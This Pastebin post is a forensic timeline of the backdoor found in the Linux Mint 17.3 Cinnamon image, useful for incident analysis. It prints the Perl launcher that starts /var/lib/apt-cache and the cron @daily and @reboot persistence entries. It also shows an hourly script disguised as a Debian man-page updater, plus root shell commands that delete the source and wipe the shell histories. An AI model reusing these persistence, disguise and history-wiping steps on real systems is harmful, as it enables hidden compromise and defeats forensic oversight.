Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Linux Mint 17.3 Cinnamon edition backdoor timeline
- * man.cy (9bc3f9009fcdad9a26c652eb8ef9a89f)
- https://www.virustotal.com/en/file/b3b40059aa95d260b1c2df5a071cdc8b508c59ddcc75b88b11b94fb32dda35e0/analysis/
- File mentioned on The Linux Mint Blog http://blog.linuxmint.com/?p=2994 in /var/lib/
- -rw-r--r-- 1 root root 35365 Feb 19 14:27 man.cy
- https://gist.github.com/Oweoqi/31239851e5b84dbba894
- * man (192ab4fb95b73dd3046362a36d6387e7)
- https://www.virustotal.com/en/file/c29a12258d3383912fb9d2fc5d17651a2e606426dca729582ba8585a610bbb21/analysis/
- In /var/lib
- -rwxr-xr-x 1 root root 118 Feb 19 14:44 man
- #!/usr/bin/perl
- $ps = `ps aux | grep apt-cache`;
- if(length($ps)>300) { die; } else {
- system("/var/lib/apt-cache");
- }
- * apt-cache (d945f9b959f76afe24f3a804fe316806)
- https://www.virustotal.com/en/file/b0134fe076b976d3fe1565385d15666bf3b68bd2a01718ef414dfa5c65365abb/analysis/
- In /var/lib/
- -rwxr-xr-x 1 root root 31816 Feb 19 14:42 apt-cache
- * /root/.bash_history
- -rw------- 1 root root 73 Feb 19 14:45 /root/.bash_history
- ls
- rm -f man.c
- rm -f /root/.bash_history
- rm -f /root/.nano_history
- exit
- * /var/log/apt/history.log
- Start-Date: 2016-02-19 13:30:11
- Commandline: apt-get install build-essential
- Install: libstdc++-4.8-dev:amd64 (4.8.4-2ubuntu1~14.04.1, automatic), dpkg-dev:amd64 (1.17.5ubuntu5.5, automatic), libc-dev-bin:amd64 (2.19-0ubuntu6.7, automatic), g++:amd64 (4.8.2-1ubuntu6, automatic), g++-4.8:amd64 (4.8.4-2ubuntu1~14.04.1, automatic), build-essential:amd64 (11.6ubuntu6), libc6-dev:amd64 (2.19-0ubuntu6.7, automatic)
- Upgrade: libasan0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libquadmath0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), gcc-4.8-base:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), gcc-4.8-base:i386 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), cpp-4.8:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgomp1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libtsan0:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libc6:amd64 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libc6:i386 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libatomic1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgcc-4.8-dev:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libdpkg-perl:amd64 (1.17.5ubuntu5.4, 1.17.5ubuntu5.5), gcc-4.8:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libgfortran3:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libc6-dbg:amd64 (2.19-0ubuntu6.6, 2.19-0ubuntu6.7), libstdc++6:i386 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libstdc++6:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1), libitm1:amd64 (4.8.4-2ubuntu1~14.04, 4.8.4-2ubuntu1~14.04.1)
- End-Date: 2016-02-19 13:31:45
- * /var/spool/cron/crontabs/root
- 156957 4 -rw------- 1 root crontab 1147 Feb 17 18:05 ./var/spool/cron/crontabs/root
- Crontab modified to add /var/lib/man
- # DO NOT EDIT THIS FILE - edit the master and reinstall.
- # (/tmp/crontab.VyGC8a/crontab installed on Wed Feb 17 17:05:35 2016)
- # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
- # Edit this file to introduce tasks to be run by cron.
- #
- # Each task to run has to be defined through a single line
- # indicating with different fields when the task will be run
- # and what command to run for the task
- #
- # To define the time you can provide concrete values for
- # minute (m), hour (h), day of month (dom), month (mon),
- # and day of week (dow) or use '*' in these fields (for 'any').#
- # Notice that tasks will be started based on the cron's system
- # daemon's notion of time and timezones.
- #Common Examples:
- @daily /var/lib/man
- @reboot /var/lib/man
- # Output of the crontab jobs (including errors) is sent through
- # email to the user the crontab file belongs to (unless redirected).
- #
- # For example, you can run a backup of all your user accounts
- # at 5 a.m every week with:
- # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
- #
- # For more information see the manual pages of crontab(5) and cron(8)
- #
- # m h dom mon dow command
- * /etc/cron.hourly/man.sh
- 263158 4 -rw-r--r-- 1 root root 172 Feb 17 18:03 ./etc/cron.hourly/man.sh
- #!/bin/sh
- #
- # Script to update all the man pages
- #
- # Written by {full-name-debian-dev} <{email-debian-dev}> for the Debian project.
- #
- cd "/var/lib/"
- ./man > /dev/null 2>&1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement